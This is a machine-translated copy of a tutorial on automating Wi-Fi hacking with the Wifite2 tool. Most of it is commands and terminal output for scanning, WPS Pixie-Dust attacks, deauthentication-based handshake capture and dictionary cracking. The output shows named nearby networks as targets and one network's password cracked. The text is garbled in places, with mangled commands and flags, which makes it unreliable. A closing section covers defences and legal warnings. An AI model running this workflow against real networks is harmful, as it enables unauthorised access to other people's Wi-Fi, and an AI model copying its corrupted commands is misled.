قالب وردپرس درنا توس
Home / Tips and Tricks / How to automate Wi-Fi Hacking with Wifite2 «Zero byte :: WonderHowTo

How to automate Wi-Fi Hacking with Wifite2 «Zero byte :: WonderHowTo



There are many ways to attack a Wi-Fi network. The type of encryption, the manufacturer's settings and the number of clients who are connected all dictate how easy a goal is to attack and which method works best. Wifite2 is a powerful tool that automates Wi-Fi hacking, allowing you to select targets within the range and let the script choose the best strategy for each network.

Wifite2 vs Wifite

Wifite has been around for a long time and was one of the first Wi-Fi hack tools I introduced to. Along with Besside-ng, automatic Wi-Fi hacking scripts also enabled script kiddies to have a significant effect without knowing much about how the script worked. Compared to Besside-ng, the original Wifite was very thorough in using all available tools to attack a network, but it can also be very slow.

One of the best features of the original Wifite was the fact that it performed a Wi-Fi site investigation before attacking adjacent networks, enabling an attacker to easily target one, part, or all neighboring networks . By placing available goals in an easily understandable format, even a beginner can understand which attacks can work best against neighboring networks.

The original Wifite would automatically attack WPA networks by attempting to capture a handshake or by using the Reaver brute-force WPS setting PIN of the neighboring network. While this method was effective, it may turn out to take 8 hours or more to complete.

The updated WiFite2 is much faster, pervading attacks in less time and relying on more refined tactics than the previous version. Because of this, Wifite2 is a more serious and powerful Wi-Fi hacking tool than the original Wifite.

Attack Flow for Wi-Fi Hacking

Wifite2 follows a simple but effective workflow to hack nearby networks as quickly as possible. To do so, press each tactic that you try to reach the practical limit, and even try to crack some handshakes as it gets.

In the first step, Wifite2 scans all channels looking for a network within the range. It ranks these networks that detect themselves through signal strength, because a network that is detected does not ensure that you can reliably communicate with it.

Organized from strongest to weakest signal strength means that the reconnaissance phase collects information about which networks exist and which hacking techniques they can be vulnerable to. Because of the way Wifite2 is organized, it is easy to add a directed Wi-Fi antenna to use Wifite2 to locate the source of a nearby Wi-Fi network when a site survey is performed.

After the site survey is complete, all targets shown will show if there are affiliate clients, whether the network is advertising WPS and what type of encryption the network uses. Based on this, an attacker can choose any target, group goal or all targets to initiate an attack based on the information collected.

Wifite2 will evolve through the target list starting with the fastest and easiest attacks, such as WPS-Pixie, which could lead to a password break in seconds, to less secure tactics such as looking for weak passwords with a dictionary attack. If an attack fails or takes too long, Wifite2 will proceed to the next applicable attack without wasting hours that its predecessor was likely to do.

What You Need

To get started, you need a Wi-Fi network card that you can put into wireless display mode. This means that you choose one that is compatible with Kali Linux, which we have several excellent guides on.

By default, Wifite2 is installed on Kali Linux, so I recommend that you either use Kali in a virtual machine or double-booted on a laptop. You can use Wifite2 on other Linux systems, but I do not go through the installation because this guide assumes you are using Kali Linux.

Recommended adapter: Alpha AWUS036NHA

Step 1: Install Wifite2

] If you do not already have Wifite2 installed on your system, you can do so from the GitHub archive. First, you can clone the repository by opening a terminal window and typing the following commands.

  gon cloned https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install 

This should download and install Wifite2 on your system. To test if it worked, write wifite -h to see information about the installed version.

  wifite -h

. .
. & # 39; ·. . · `. wifite 2.1.6
::: (¯) ::: Automated wireless auditor
`. · `/ ¯ · & # 39; ·. & # 39; Https://github.com/derv82/wifite2
`/ ¯¯¯

optional arguments:
-h, - help Show this help message and exit

SETTINGS:
-v, --verbose Shows more options (-h -v). Prints commands and outputs. (default: silent)
-i [interface] Wireless interface to use (default: select first or query)
-c [channel] Wireless channel to scan (default: all channels)
-mac, --random-mac Randomize MAC address for wireless card (default: off)
-p [scantime] Pillage: Attack all targets after scantime seconds
--kill Kill processes that violate Airmon / Airodump (default: off)
- Only clients, -co Show only targets that have associated clients (default: off)
--nodeauths Passive mode: Never authenticate clients (default: deauth target)

WEP:
--Wep Filter to show only WEP encrypted networks (default: off)
--require-fakeauth Drops if false auth fail (default: off)
--keep-ivs Keep .IVS files and reuse for cracking (default: off)

WPA:
--wpa Filter to show only WPA encrypted networks (contains WPS)
--new-hs Captures new handshakes, ignores existing handshakes in ./hs (default: off)
--dict [file] File containing cracking password (default: /usr/share/wordlists/fern-wifi/common.txt)

WPS:
--wps Filter to show only WPS-enabled networks
- bully Use bully instead of reader for WPS attacks (standard: reaver)
--no-wps NEVER use WPS (Pixie-Dust) attacks on non-WEP networks (default: off)
--wps-only ALWAYS use WPS (Pixie-Dust) attacks on non-WEP networks (default: off)

UNDERSTANDING:
-ev, --eviltwin Use the "Evil Twin" attack against all targets (default: off)

commands:
--racked Show previously cracked access points
- check [file] Check a .cap file (or all hs / * .cap files) for WPA handshakes
--rack Show commands to crack a captured handshake 

Step 2: Connect your Wi-Fi card

With Wifite2 installed on your system, you need to plug in your Kali Linux compatible wireless network adapter. Wifite2 takes care not only to automatically select a wireless network adapter to use but also puts the wireless card in the monitor mode for you, which means you don't have to do anything after connecting the adapter.

Step 3: Set Flags & Find a Target

If we know which channel we are attacking, we can select it by adding the -c command followed by the channel number. Other than that, writing Wifite2 is as simple as writing wifite and letting the script collect information.

  wifite-c 11

. .
. & # 39; ·. . · `. wifite 2.1.6
::: (¯) ::: Automated wireless auditor
`. · `/ ¯ · & # 39; ·. & # 39; Https://github.com/derv82/wifite2
`/ ¯¯¯

[+] option: scan for target on channel 11
[!] conflicting process: NetworkManager (PID 464)
[!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 13595)
[!] if you have problems: dead -9 PID or run again wifite with --kill

[+] looking for wireless interfaces

Interface PHY Driver Chipset
-------------------------------------------------- ---------------------
1. wlan0 phy3 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

[+] enables monitoring mode on wlan0 ... enabled wlan0mon

NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- --------
1 Suicidegirls 11 WPA 48db no
2 Bourgeois Pig Guest 11 WPA 45db no
3 BPnet 11 WPA 42db no
4 DirtyLittleBirdyFeet 11 WPA 32db nr 5
5 ATT73qDwuI 11 WPA 32db yes
6 SpanishWiFi 11 WPA 24db no
7 Franklin Lower 11 WPA 20db No. 3
8 Sonos 11 WPA 11db no
9 Villa Carlotta 11 WPA 11db no
10 Sonos 11 WPA 10db no
[+] select target (s) (1-10) separated by commas, hyphens or all: 

Here we performed a search on channel 11 and found 10 different targets. Of these, two customers are connected, one has WPS enabled, and all use WPA security.

Step 4: Examine the site survey & select goals

From our survey, we can see that target date May 5 present the best goal. While the signal strength is not the best, and there are no connected clients, we can probably get a handshake with the new PMKID attack even if no one is connected.

If we are looking for weak passwords, the first three networks have the strongest signal strength, while goals 4 and 7 have the best chance of making a quick four-way handshake to try brute-force later. If we target a particular network, it is now that we can choose it. If we want to select the most probable networks, we can choose goals 4, 5 and 7 for the probability that a fast handshake is taken and broken if the WPS PIN is not cracked first.

If we want to focus on simple goals we can say that the script only shows goals that are vulnerable to a certain type of attack. To show only WPS targets that can be vulnerable to Reaver or Bully attacks, we can run Wifite2 with the -wps flag .

  wifite -wps

. .
. & # 39; ·. . · `. wifite 2.1.6
::: (¯) ::: Automated wireless auditor
`. · `/ ¯ · & # 39; ·. & # 39; Https://github.com/derv82/wifite2
`/ ¯¯¯

[+] alternative: targeting WPS encrypted networks
[!] conflicting process: NetworkManager (PID 464)
[!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 14824)
[!] if you have problems: dead -9 PID or run again wifite with --kill

[+] looking for wireless interfaces

Interface PHY Driver Chipset
-------------------------------------------------- ---------------------
1. wlan0 phy4 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

[+] enables monitoring mode on wlan0 ... enabled wlan0mon

NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- --------
1 SBG6580E8 1 WPA 45db yes
2 The Daily Planet 1 WPA 30db yes 1
3 ATT73qDwuI 11 WPA 28db yes
4 birds-Wireless 2 WPA 23db yes
[+] select target (s) (1-4) separated by commas, hyphens or all: 

We can do the same with -wpa or -wep to show only goals that match these types of encryption.

Step 5: Automate Attacks by Target Type

From our results list, let's choose a goal with both WPS enabled and clients attached. After selecting the number on the network we want to attack, Wifite2 continues through the most appropriate attacks on the network.

  [+] (1/1) starting attacks against 69: 96: 43: 69: D6: 96 (The Daily Planet)
[+] Daily Planet (76db) WPS Pixie-Dust: [--78s] Failed: Timeout after 300 seconds
[+] The Daily Planet (52db) WPA Handshake capture: Discovered new client: C8: E0: EB: 45: CD: 45
[+] The Daily Planet (35db) WPA Handshake capture: Listen. (clients: 1, deauth: 11s, timeout: 7m59s)

[+] successfully captured handshake
[+] Save copy of handshake to hs / handshake_TheDailyPlanet_69: 96: 43: 69: D6: 96_2018-12-24T00-33-18.cap saved

[+] analysis of captured handshake file:
[+] tshark: .cap file contains a valid handshake for 69: 96: 43: 69: D6: 96
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: .cap file contains a valid 69: 96: 43: 69: D6: 96 handshake

[+] Cracking WPA Handshake: Using aircrack via common.txt dictionary

[!] Failed to crack handshake: common.txt did not contain passwords
[+] Ready to attack 1 goal, exit 

Here we can see that while the WPS-Pixie attack failed, we could easily grab and attack a handshake. The WPS-Pixie attack took place quite quickly, so we wasted a minimum of time exploring this attack attack. Sometimes different wireless cards work better with different scripts, and this is true with Reaver and Bully. If one does not work for you, try the other.

Wifite2 uses Reaver by default, but you can change this to Bully using the -bully flag .

  wifite -wps -bully

. .
. & # 39; ·. . · `. wifite 2.1.6
::: (¯) ::: Automated wireless auditor
`. · `/ ¯ · & # 39; ·. & # 39; Https://github.com/derv82/wifite2
`/ ¯¯¯

[+] alternative: use bullying instead of reagent for WPS Attacks
[+] alternative: targeting WPS encrypted networks
[!] conflicting process: NetworkManager (PID 464)
[!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 14824)
[!] if you have problems: dead -9 PID or run again wifite with --kill

[+] looking for wireless interfaces
uses interface wlan0mon (already in monitor mode)
You can enter the wireless interface with -i wlan0

NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- --------
1 SBG6580E8 1 WPA 46db yes
2 The Daily Planet 1 WPA 34db yes 1
[+] select target (s) (1-2) separated by commas, hyphens or all: 2

[+] (1/1) starts attacks against 78: 96: 84: 00: B5: B0 (The Daily Planet)
[+] Daily Planet (44db) WPS Pixie-Dust: [4m0s] Failed: More than 100 timeouts
[+] Daily Planet (34db) WPA Handshake capture: found existing handshake for The Daily Planet
[+] Using handshake from hs / handshake_TheDailyPlanet_78-96-84-00-B5-B0_2018-12-24T00-33-18.cap

[+] analysis of captured handshake file:
[+] tshark: .cap file contains a valid handshake for 78: 96: 84: 00: b5: b0
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: .cap file contains a valid handshake for 78: 96: 84: 00: B5: B0

[+] Cracking WPA Handshake: Using aircrack via common.txt dictionary

[!] Failed to crack handshake: common.txt did not contain passwords
[+] Ready to attack 1 goal, exit 

While we did not have a better result with Bully, trials are both a good way to find out which wireless network adapter is best suited.

Step 6: Skip and review results

If Wifite2 takes too long on a particular attack, we can always skip the current attack by pressing Ctrl-C for to get a menu asking if we "I want to continue. Here you can skip to the next attack by pressing c or type s to stop Wifite2.

  [+] SBG6580E8 (47db) WPS Pixie-Dust: [4m52s] Test PIN 12523146 (DeAuth: Timeout) (Timeouts: 15)
[!] canceled

[+] 1 attack (s) left, do you want to continue?
[+] type c continues or s to stop: 

If we can only get a four-way handshake, we might want to add a custom glossary of password guesses to try to crack the handshake. We can do this by setting the – dict flag to set the file containing the cracking password, the default setting is set to /usr/share/wordlists/fern-wifi/common.txt. This password list contains many common passwords, but you want to use your own if you are serious about getting results.

Below we decrypt a captured handshake using a custom dictionary "passwords.txt." [19659019] wifite -wpa –dict ./passwords.txt

. .
. & # 39; ·. . · `. wifite 2.1.6
::: (¯) ::: Automated wireless auditor
`. · `/ ¯ · & # 39; ·. & # 39; Https://github.com/derv82/wifite2
`/ ¯¯¯

[+] option: use dictionary ./passwords.txt to crack WPA handshake
[+] options: targeting WPA-encrypted networks
[!] conflicting process: NetworkManager (PID 419)
[!] conflicting process: wpa_supplicant (PID 585)
[!] conflicting process: dhclient (PID 7902)
[!] if you have problems: dead -9 PID or run again wifite with –kill

[+] looking for wireless interfaces
uses interface wlan0mon (already in monitor mode)
You can enter the wireless interface with -i wlan0

NUM ESSID CH ENCR POWER WPS? CLIENT
— ————————- — —- —– —- ——–
1 Suicidegirls 11 WPA 58db n / a
2 Bourgeois Pig Guest 11 WPA 56db n / a
3 BPnet 11 WPA 56db n / a
4 The Daily Planet 1 WPA 49db n / a 1
5 SBG6580E8 1 WPA 49db n / a
6 Hyla Hair 2.4G 8 WPA 48db n / a
7 TWCWiFi Pass Point 1 WPA 46db n / a
8 HP-Print-B9 Officejet … 1 WPA 40db n / a
9 birds-Wireless 2 WPA 39db n / a
SpanishWiFi 11 WPA 38db n / a
[!] Airodump unexpectedly interrupted (Code: 0) Command: airodump-ng wlan0mon -a -w / tmp / wifitei_l5H1 / airodump – write interval 1 – output format PCAP, csv
[+] select target (s) (1-10) separated by commas, hyphens or all: 2

[+] (1/1) starting attacks against DE: F2: 86: EC: CA: A0 (Bourgeois Pig Guest)
[+] Bourgeois Pig Guest (57db) WPA Handshake capture: Discovered new client: F0: D5: BF: BD: D5: 2B
[+] Bourgeois Pig Guest (58db) WPA Handshake capture: New client detected: 6C: 8D: C1: A8: E4: E9
[+] Bourgeois Pig Guest (59db) WPA Handshake Catch: Listen. (clients: 2, deauth: 14s, timeout: 8m1s)

[+] successfully captured handshake
[+] Save copy of handshake to hs / handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap saved

[+] analysis of captured handshake file:
[+] tshark: .cap file contains a valid handshake for the: f2: 86: ec: ca: a0
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (Bourgeois Pig Guest)
[+] aircrack: .cap file contains a valid handshake for DE: F2: 86: EC: CA: A0

[+] Cracking WPA Handshake: Using aircrack-ng via password.txt dictionary
[+] Cracking WPA Handshake: 100.00% ETA: 0s @ 2234.0kps (current key: christmasham)
[+] Cracked WPA Handshake PSK: christmasham

[+] Address point name: Bourgeois Pig Guest
[+] Access point BSSID: DE: F2: 86: EC: CA: A0
[+] Encryption: WPA
[+] Handshake File: hs / handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap
[+] PSK (password): christmasham
[+] saved crack results to cracked.txt (1 total)
[+] Ready to attack 1 goal, exit

By adding a good password file, we can improve our chances of cracking a Wi-Fi network password, even if the faster WPS attacks fail.

Some Practical Warnings & Defense

Wifite2 is an example of how even script scripts can be effective against networks with common vulnerabilities such as WPS settings PINs and weak passwords. With an increasing amount of the more advanced attacks being automated, it is important that you learn about the most common and most effective ways to attack a Wi-Fi network.

Generally, the best way to defend your network from tools like Wifite2 is to make sure you have WPS disabled and select a very strong password for your Wi-Fi network that you don't share with someone you don't need .

It is important to note that by choosing "everything" in a target list, Wifite2 will attack all networks it has discovered, not just those you are allowed to attack. You must have permission to use this tool on any network you attack because attacking a network belonging to someone without permission is a crime and can cause you a lot of trouble. Saying the script was not an excuse if you were caught attacking an important network, so be sure to keep Wifite2 targeting networks that you have the authority to review.

I hope you had this guide to automate Wi-Fi hacking with Wifite2! If you have any questions about this guide on Wi-Fi hacking tools or if you have a comment, write it below in the comments or reach me on Twitter @KodyKinzie .

Don't miss: Use MDK3 for advanced Wi-Fi jamming

Cover photo by Kody / Null Byte




Source link